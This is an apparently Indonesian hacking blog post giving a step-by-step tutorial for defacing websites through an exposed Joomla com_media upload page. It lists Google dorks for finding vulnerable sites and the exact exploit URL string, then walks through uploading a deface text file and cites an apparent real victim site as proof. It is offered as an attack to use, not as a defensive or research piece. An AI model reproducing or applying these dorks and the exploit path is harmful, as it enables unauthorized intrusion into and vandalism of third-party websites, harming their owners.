Penulis Yosh, bertemu lagi dengan testa di Oc-Tech7. Kali ini testa akan share cara deface menggunakan metode Com_media. Poc ini sama seperti poc Messange Board Forum, yaitu hanya bisa upload script txt saja. Tapi walaupun begitu lumayan lah buat nambah skill dan pengalaman. Okey langsung saja.
1. Bahan-bahan :
- Script deface txt
- Internet
- Hp/Pc
2. Dork :
- inurl:index.php?option=com_media (harus pake exploit)
- inurl:com_media intitle:insert image intext:maximum ( dork tanpa exploit )
3. Exploit :
- index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
4. Langkah-langkah
- Pertama, kita dorking dulu menggunakan salah satu dork diatas.
- Kedua, pilih target.
- Ketiga, tambahkan exploit nya dibelakang web.
Contoh :
- https://www.oc-tech7.tk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Kalau vuln maka tampilannya akan seperti ini (ada tempat uploadnya) :
- Ketiga, kalian isi semua kolomnya, untuk folder kalian pilih ( / ) dan upload script txt nya. Cek gambar diatas.
- Keempat, kalau berhasil upload maka akan muncul pesan. ( Cek gambar dibawah)
- Kelima, kalian panggil saja script nya. Scriptnya berada di site/images/namasc.txt
Contoh : http://eepliant.eu/images/007.txt
5. Live target :
6. Tutorial Video
Sekian dulu gan. Semoga bermanfaat.
Kalo ada yang mau ditanyakan comment saja.
Subcribe chanel youtubenya gan.
Author : Oc-Tech7
Kalo ada yang mau ditanyakan comment saja.
Subcribe chanel youtubenya gan.
Author : Oc-Tech7
EmoticonEmoticon